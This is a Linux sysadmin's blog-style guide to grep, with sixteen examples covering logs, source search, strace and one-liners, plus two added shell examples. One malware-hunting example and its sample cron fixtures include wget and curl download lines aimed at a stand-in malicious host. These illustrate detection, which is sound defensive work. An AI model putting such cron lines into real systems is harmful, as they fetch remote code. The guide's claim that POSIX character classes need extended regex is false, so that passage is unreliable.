As an experienced Linux system administrator and command line geek, grep is one of my most used and cherished tools. With its simple yet powerful abilities to filter text streams and search files by regex patterns, grep enables me to quickly slice and dice textual data to extract just what I need.
In my decade-plus in this field, I've gathered numerous handy grep techniques and use cases that make my daily work far more productive. I'd like to share some of my grep wisdom with you in this comprehensive guide, so you can also master this versatile utility.
While grep's basic usage is simple, truly harnessing its capabilities requires some practice and knowledge. But once internalized, grep skills will boost your effectiveness at the terminal.
Let's dive into 16 practical examples of how to use grep in real-world situations. I'll share tips and flags you may not know, along with examples of how I leverage grep in my daily work.
Grep Basics: A Quick Primer
For those new to grep, let's first cover some basics. The core syntax is:
grep [options] pattern [file]
This searches for pattern within file and prints any matching lines. For example:
grep admin /var/log/auth.log
This prints any lines in the auth log containing "admin".
Grep accepts various useful options, like -i for case-insensitive search, -v to print non-matching lines, -c to print a match count, and so on.
Grep takes input from files or streams like pipelines and stdin. For example:
ps aux | grep bash
This searches running processes for "bash".
Now that we've covered the basics, let's explore some more advanced real-world examples.
1. Pinpoint Errors in Log Files
As a sysadmin, debugging issues means scanning log files for relevant error messages. This is a perfect use case for grep.
For example, if users complain that the Apache web server is failing, I'll grep the access and error logs:
grep -i fail /var/log/httpd/error_log
grep -i error /var/log/httpd/access_log
The -i makes the searches case-insensitive, so I catch all variations of "fail", "error", "Failed", etc.
Grep helps me quickly filter the verbose log contents for relevant error messages, to pinpoint the cause.
2. Search compressed logs
Log files accumulate quickly, so I often compress old logs into .gz files to save space. Grep can still search these compressed logs using zgrep:
zgrep -i error /var/log/httpd/access.log*.gz
This searches all the compressed access logs for "error". Zgrep is a great way to search logs even after they've been archived.
3. Filter command output
I often pipe command output into grep to filter out unwanted details. For example, to view only running Docker containers:
docker ps -a | grep Up
This filters stopped containers out of docker ps output.
Here's another example filtering ps output for java processes:
ps aux | grep java
Piping to grep like this makes it easy to filter noisy output down to what I actually need.
4. Quickly search file contents
I often use grep just to peek at file contents quickly. For example, to see if a config file contains a particular setting:
grep "LogLevel" /etc/httpd/conf/httpd.conf
This is faster than opening the full file in a text editor.
Here's another example checking if a Java class imports a specific package:
grep "import org.springframework" MyClass.java
Grep gives me a quick glance into files to see if they contain keywords I'm looking for.
5. Iterate through matching lines
When I need to process matching grep lines, I'll pipe them into a while loop, like:
# IFS= and -r keep leading whitespace and backslashes in each match intact
grep -Ri todo /home | while IFS= read -r line; do
    echo "TODO: $line" >> todos.txt
done
This iterates through todo matches, echoing them into a TODO list file.
Piping grep into a while loop is perfect for when I need to operate on match results.
6. Quickly count matches
To get a quick match count across files, I use the -c flag:
grep -c ERROR /var/log/*.log
This prints just the number of "ERROR" matches for a quick error report.
-c gives a fast match count overview without printing lengthy matching lines.
7. Filter logins by username
Checking which users have logged into a system recently is a common task. I grep the auth log by username:
grep sudo /var/log/auth.log | grep jsmith
This shows sudo events just for user "jsmith".
8. Find files containing text
To hunt down files containing specific text, I use recursive grep with -R:
grep -Ri TODO /home /etc
This finds all TODO comments across home dirs and config files.
-R recursively searches the given paths to hunt down matches buried in any file.
9. Watch a log file for matches
When debugging an issue, I'll monitor a log file for new matching entries using:
tail -f /var/log/mail.log | grep -i error
This streams the mail log to stdout, filtered for "error". As the log grows, I see only new error entries.
This technique helps me monitor logs live for event patterns.
10. Search across source code
As a developer, I extensively use grep to search source code trees. For example, to find all uses of a deprecated API call:
grep -R "OldApiCall" /home/project/src/
This recursively finds all instances of "OldApiCall" in my project's source.
Grep is invaluable for code searches across large, complex codebases.
11. Leverage extended regex
Grep's basic regex support is good, but I often need more advanced patterns. The -E flag enables full extended regex for complex matches:
grep -Ew "[[:alpha:]]{5}" file   # -w: match whole words only
This finds 5-letter words. The [[:alpha:]] character class is only available in extended regex.
-E unlocks powerful regex features for intricate pattern matching needs.
12. Trace system calls
When debugging performance issues, I'll trace what system calls an app is making using strace and grep:
# openat is traced as well because current glibc implements open() with it
strace -f -e trace=open,openat myapp 2>&1 | grep -v ENOENT \
| awk -F'"' 'NF > 2 {print $2}' | sort | uniq -c
This traces "open" calls, filters noise, and counts unique files opened.
Combining strace and grep helps me analyze an app's system call profile.
13. Search across boxes with SSH
When I need to search logs or files on remote servers, I use SSH with grep:
ssh user@host 'zgrep ERROR /var/log/myapp/*.log.gz'
This searches the remote compressed myapp logs for "ERROR".
SSH allows me to run grep across boxes without having to first ssh in and find the files manually.
14. Look for known malware signs
I can use grep to scan systems for signs of malware or intrusion. For example, searching for a suspicious cron job entry:
grep -R "wget http://malware.example.com/" /etc/cron* /var/spool/cron
Grep helps me quickly hunt for known malicious patterns across config and data files.
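An added example, not part of the original article: the same hunt generalized to a file of indicators and matched as fixed strings with -F, so the dots in a hostname are not treated as regex wildcards. The function names, the indicator file and the sample cron entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: names, paths and sample data are constructed.

# scan_cron IOC_FILE PATH...
# Prints file:line:text for every cron line containing an indicator.
# Returns 0 on a hit, 1 on no hit, 2 on an unusable indicator file.
scan_cron() {
    ioc_file=$1; shift
    # An empty pattern matches every line, so refuse blank indicators.
    if grep -q '^[[:space:]]*$' "$ioc_file"; then
        echo "blank line in $ioc_file" >&2
        return 2
    fi
    found=1
    for target in "$@"; do
        [ -e "$target" ] || continue   # cron layouts differ between distros
        # -F literal strings, -f patterns from file, -r recurse,
        # -n line numbers, -H file names, -I skip binary files
        if grep -rnHIF -f "$ioc_file" -- "$target" 2>/dev/null; then
            found=0
        fi
    done
    return "$found"
}

demo_scan() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/cron.d" "$tmp/spool"
    printf '%s\n' 'http://malware.example.com/' > "$tmp/iocs.txt"
    printf '%s\n' '*/5 * * * * root wget http://malware.example.com/a' \
        > "$tmp/cron.d/update"
    printf '%s\n' '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' \
        > "$tmp/cron.d/logrotate"
    # Line 1 is a lookalike that a regex "." would match; line 2 uses curl.
    printf '%s\n' '@daily curl http://malwareXexample.com/' \
        '@reboot curl -s http://malware.example.com/b' > "$tmp/spool/jsmith"
    rc=0
    scan_cron "$tmp/iocs.txt" "$tmp/cron.d" "$tmp/spool" "$tmp/absent" || rc=$?
    rm -rf "$tmp"
    return "$rc"
}
```

Calling demo_scan prints two hits, the wget entry and the curl entry; dropping "wget" from the indicator is what lets the second one surface.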
15. Find and delete matching lines
When I need to strip lines matching a pattern, I pipe grep into sed for deletion:
grep -vE '^#|^$' file.txt | sed '/pattern/d'
This prints file.txt without comments or blank lines, and omits any lines containing "pattern".
Piping grep through sed gives me surgical search-and-destroy text editing capabilities.
16. Leverage grep one-liners
I have a bag of handy grep one-liners always on hand for quick tasks, such as:
Find the largest files in /var/log:
ls -lS /var/log | grep -E '^.{45} .*$' | head
Extract IP addresses from a file:
grep -Eo '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
Print rows containing "ERROR" from a CSV (csvgrep is part of csvkit):
csvgrep -c 3 -r "ERROR" file.csv
These handy one-liners demonstrate the power and versatility of grep for tackling specialized text processing tasks.
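An added example, not from the original article, applying the IP-extraction one-liner to log triage: it counts failed SSH logins per source address. The sshd log lines are constructed samples, and the names OCTET, IPV4, failed_sources and demo_failed_sources are illustrative.

```shell
#!/bin/sh
# Added example; names and sample log lines are constructed.
# Same octet pattern as the one-liner above, folded with a {3} repeat.
OCTET='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
IPV4="($OCTET\\.){3}$OCTET"

# failed_sources LOGFILE -> "count ip" per line, busiest source first.
failed_sources() {
    grep -F 'Failed password' -- "$1" |
        # Anchor on "from <ip> port" so IP-like text elsewhere on the
        # line (for example a username that looks like an address)
        # is not counted as a source.
        grep -Eo "from $IPV4 port" |
        awk '{print $2}' |
        sort | uniq -c | sort -rn |
        awk '{print $1, $2}'
}

demo_failed_sources() {
    log=$(mktemp) || return 1
    cat > "$log" <<'EOF'
Jan 10 03:12:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Jan 10 03:12:04 web1 sshd[2101]: Failed password for root from 203.0.113.5 port 51124 ssh2
Jan 10 03:12:09 web1 sshd[2107]: Failed password for invalid user 10.0.0.1 from 198.51.100.7 port 40022 ssh2
Jan 10 03:13:00 web1 sshd[2110]: Accepted password for jsmith from 192.0.2.10 port 50212 ssh2
Jan 10 03:13:05 web1 sshd[2113]: Failed password for jsmith from 203.0.113.5 port 51130 ssh2
EOF
    failed_sources "$log"
    rm -f "$log"
}
```

On the sample, demo_failed_sources reports 203.0.113.5 with three failures and 198.51.100.7 with one; the accepted login and the address-shaped username are left out.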
Conclusion
I hope this guide provides some practical examples of how grep can be leveraged in real-world scenarios, beyond basic usage. Mastering grep is a fundamental skill that will boost your proficiency at the command line.
Here are some key takeaways:
- Grep enables powerful searches through files, streams and logs.
- Options like -i, -v, -c, -E give additional flexibility.
- Use grep across boxes via SSH or on compressed logs with zgrep.
- Extended regex with -E provides advanced matching capabilities.
- Piping grep into loops, sed, awk, or other tools unlocks more applications.
- Keep handy grep one-liners in your back pocket for frequent tasks.
With regular practice, you'll quickly find yourself reaching for grep to filter, search, and slice textual data like a pro. It's one of the most indispensable tools for any Linux power user.
I hope these examples provide some practical usage inspiration as you continue honing your grep skills. Let me know if you have any other handy grep tricks!